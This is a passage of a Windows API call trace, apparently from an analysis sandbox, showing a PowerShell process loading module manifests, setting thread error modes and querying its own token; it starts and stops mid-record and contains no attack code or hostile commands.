ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.629] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a9d0 | out: lpFindFileData=0x653ef8a9d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.629] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a9d0 | out: lpFindFileData=0x653ef8a9d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0281.629] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a9d0 | out: lpFindFileData=0x653ef8a9d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.629] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac30) returned 1 [0281.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abf0) returned 1 [0281.629] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x653ef8a8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0281.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ad20) returned 1 [0281.629] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8ae00 | out: lpFileInformation=0x653ef8ae00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0281.630] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ace0) returned 1 [0281.630] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x653ef8a5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0281.630] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aac0) returned 1 [0281.630] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x7f4 [0281.630] GetFileType (hFile=0x7f4) returned 0x1 [0281.630] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa30) returned 1 [0281.630] GetFileType (hFile=0x7f4) returned 0x1 [0281.630] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c1232d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8ab98, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1232d8*, lpNumberOfBytesRead=0x653ef8ab98*=0x1000, lpOverlapped=0x0) returned 1 [0281.630] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c1232d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8ab98, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1232d8*, lpNumberOfBytesRead=0x653ef8ab98*=0x1000, lpOverlapped=0x0) returned 1 [0281.630] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c1232d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8ab98, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1232d8*, lpNumberOfBytesRead=0x653ef8ab98*=0x1000, lpOverlapped=0x0) returned 1 [0281.630] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c1232d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8ab98, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1232d8*, lpNumberOfBytesRead=0x653ef8ab98*=0x5e5, lpOverlapped=0x0) returned 1 [0281.630] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c1227fd, nNumberOfBytesToRead=0x21b, lpNumberOfBytesRead=0x653ef8ab98, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1227fd*, lpNumberOfBytesRead=0x653ef8ab98*=0x0, lpOverlapped=0x0) returned 1 [0281.630] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c1232d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8ab98, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1232d8*, lpNumberOfBytesRead=0x653ef8ab98*=0x0, lpOverlapped=0x0) returned 1 [0281.630] CloseHandle (hObject=0x7f4) returned 1 [0281.634] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0281.634] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psm1")) returned 0xffffffff [0281.634] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.cdxml")) returned 0xffffffff [0281.634] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.xaml")) returned 0xffffffff [0281.634] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.dll")) returned 0xffffffff [0281.634] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.635] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.635] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ab10) returned 1 [0281.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa40) returned 1 [0281.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa00) returned 1 [0281.635] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ab10) returned 1 [0281.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa40) returned 1 [0281.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa00) returned 1 [0281.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ab20) returned 1 [0281.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aae0) returned 1 [0281.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ab70) returned 1 [0281.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aaa0) returned 1 [0281.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa60) returned 1 [0281.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8acb0) returned 1 [0281.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac70) returned 1 [0281.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ad00) returned 1 [0281.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac30) returned 1 [0281.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abf0) returned 1 [0281.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ad20) returned 1 [0281.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ace0) returned 1 [0281.637] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x653ef8a5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0281.637] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aac0) returned 1 [0281.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa30) returned 1 [0281.638] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0281.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ab10) returned 1 [0281.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa40) returned 1 [0281.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa00) returned 1 [0281.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ab10) returned 1 [0281.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa40) returned 1 [0281.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa00) returned 1 [0281.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8a980) returned 1 [0281.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8a8b0) returned 1 [0281.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8a870) returned 1 [0281.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8a980) returned 1 [0281.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8a8b0) returned 1 [0281.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8a870) returned 1 [0281.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8a990) returned 1 [0281.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8a950) returned 1 [0281.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8a9e0) returned 1 [0281.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8a910) returned 1 [0281.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8a8d0) returned 1 [0281.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ab20) returned 1 [0281.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aae0) returned 1 [0281.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ab70) returned 1 [0281.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aaa0) returned 1 [0281.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa60) returned 1 [0281.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8acb0) returned 1 [0281.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac70) returned 1 [0281.641] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ad00) returned 1 [0281.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac30) returned 1 [0281.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abf0) returned 1 [0281.641] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ad20) returned 1 [0281.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ace0) returned 1 [0281.641] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0x653ef8a5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0281.641] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aac0) returned 1 [0281.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa30) returned 1 [0281.641] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ae40) returned 1 [0281.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ae00) returned 1 [0281.641] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ae90) returned 1 [0281.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8adc0) returned 1 [0281.642] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ad80) returned 1 [0281.642] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ae30) returned 1 [0281.642] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ad60) returned 1 [0281.642] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ad20) returned 1 [0281.642] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ae30) returned 1 [0281.642] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ad60) returned 1 [0281.642] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ad20) returned 1 [0281.642] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.642] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.643] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.643] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8acb0) returned 1 [0281.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac70) returned 1 [0281.643] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ad00) returned 1 [0281.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac30) returned 1 [0281.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abf0) returned 1 [0281.643] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.643] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8acb0) returned 1 [0281.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac70) returned 1 [0281.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ad00) returned 1 [0281.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac30) returned 1 [0281.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abf0) returned 1 [0281.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8acb0) returned 1 [0281.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac70) returned 1 [0281.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ad00) returned 1 [0281.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac30) returned 1 [0281.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abf0) returned 1 [0281.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8acb0) returned 1 [0281.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac70) returned 1 [0281.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ad00) returned 1 [0281.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac30) returned 1 [0281.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abf0) returned 1 [0281.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.646] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8acb0) returned 1 [0281.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac70) returned 1 [0281.646] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ad00) returned 1 [0281.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac30) returned 1 [0281.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abf0) returned 1 [0281.646] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.646] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.646] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8acb0) returned 1 [0281.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac70) returned 1 [0281.646] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ad00) returned 1 [0281.647] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac30) returned 1 [0281.647] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abf0) returned 1 [0281.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.647] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.647] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.647] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.647] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8acb0) returned 1 [0281.647] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac70) returned 1 [0281.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ad00) returned 1 [0281.647] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac30) returned 1 [0281.647] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abf0) returned 1 [0281.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8acb0) returned 1 [0281.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac70) returned 1 [0281.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ad00) returned 1 [0281.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac30) returned 1 [0281.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abf0) returned 1 [0281.649] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.649] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.649] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.661] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d007a0 [0281.661] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d007a0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0281.661] CoTaskMemFree (pv=0x25b73d007a0) [0281.661] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8aac0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0281.661] GetCurrentProcess () returned 0xffffffffffffffff [0281.661] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8b008 | out: TokenHandle=0x653ef8b008*=0x7f4) returned 1 [0281.661] GetTokenInformation (in: TokenHandle=0x7f4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8b108 | out: TokenInformation=0x0, ReturnLength=0x653ef8b108) returned 0 [0281.661] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984630 [0281.661] GetTokenInformation (in: TokenHandle=0x7f4, TokenInformationClass=0x1, TokenInformation=0x25b73984630, TokenInformationLength=0x2c, ReturnLength=0x653ef8b108 | out: TokenInformation=0x25b73984630, ReturnLength=0x653ef8b108) returned 1 [0281.662] LocalFree (hMem=0x25b73984630) returned 0x0 [0281.662] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c364168, cbSid=0x653ef8b100 | out: pSid=0x25b5c364168*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8b100) returned 1 [0281.662] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8afa0*=0x7dc, lpdwindex=0x653ef8ad74 | out: lpdwindex=0x653ef8ad74) returned 0x0 [0281.663] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8aa10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0281.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1", nBufferLength=0x105, lpBuffer=0x653ef8aba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1", lpFilePart=0x0) returned 0x77 [0281.665] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfdf40 [0281.665] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfdf40 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0281.665] CoTaskMemFree (pv=0x25b73cfdf40) [0281.665] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8a950, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0281.667] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfee20 [0281.667] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfee20 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0281.667] CoTaskMemFree (pv=0x25b73cfee20) [0281.667] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, 